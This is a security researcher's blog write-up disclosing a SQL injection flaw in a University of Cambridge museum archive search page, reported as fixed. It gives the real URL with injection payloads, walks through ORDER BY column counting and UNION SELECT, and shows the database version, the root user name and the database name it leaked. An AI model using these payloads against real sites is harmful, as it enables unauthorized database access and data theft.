Aug 24, 2018
SQL Injection Vulnerability In University Of Cambridge
Hello
Introduction Of Author:
I am Adesh Nandkishor Kolte ,An Independent Security Resercher From India
Found a SQL Injection Vulnerability in University Of Cambridge
This is the most prevalent and most dangerous of web application vulnerabilities. Having this SQLi vulnerability in the application, an attacker may cause severe damage such as bypassing logins, retrieving sensitive information, modifying, deleting data. Sometimes this costs life when it comes to Healthcare, Banking domains. Okay introduction apart, the objective of this article is to exploit and read some sensitive data from the database. If you don’t know what exactly is this SQLi then read my other article which may throw some light. I am splitting the subject into two parts, having everything in one might throw you out of interest.
Identifying the vulnerable site!
I tried the most basic check for SQL vulnerability by inserting an apostrophe (‘) in the username field and leaving the password field empty and trying to login, after a few attempts this website gave me an SQL error which looked something like this.
Now, lets get started. Launch your Target select SQL injection GET/Search.
Our Target URL :
Fixing The Error
So I tried Some tricks for fixing this error which occur when i entered the single quote (‘)
Like that
https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=’named_individuals_sum’ — +(worked :) Fixed The error )
Finding Columns Using Order By or Group By
Order By Clause in My SQL
The SQL ORDER BY clause is used to sort the data in ascending or descending order, based on one or more columns. Some databases sort the query results in an ascending order by default.
Group By Clause in My SQL
The SQL GROUP BY clause is used in collaboration with the SELECT statement to arrange identical data into groups. This GROUP BY clause follows the WHERE clause in a SELECT statement and precedes the ORDER BY clause.
For finding the Column here i used order by clause
https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=’named_individuals_sum’ order by 16 — +
so i tried order by 15 — + here
https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=’named_individuals_sum’ order by 1 5— +
Site Loaded Normally so this website have 15 columns
Finding Vulnerable Column From 15 Columns
For finding vulnerable Column i have to use the keyword in MYSQL
UNION SELECT
What is the use of Union Clause in My SQL?
The SQL UNION clause/operator is used to combine the results of two or more SELECT statements without returning any duplicate rows
What is SELECT Statement ?
The SQL SELECT statement is used to fetch the data from a database table which returns this data in the form of a result table. These result tables are called result-sets.
— — — — — —
Syntax
The basic syntax of the UNION SELECT statement is as follows
UNION SELECT column1, column2, columnN FROM table_name;
Getting Required Data
Finding Version, User and Database name SQL provide function for that
For example version(),User() and database()
Version()
Output:
5.1.39-community
User()
output:
root@koala.fitzmuseum.cam.ac.uk
Database()
Output:
wn_index
Video Demonstration:
I reported last week and vulnerability Fixed :)
I hope you like the Article
Thanks for Reading and Happy Hunting :)
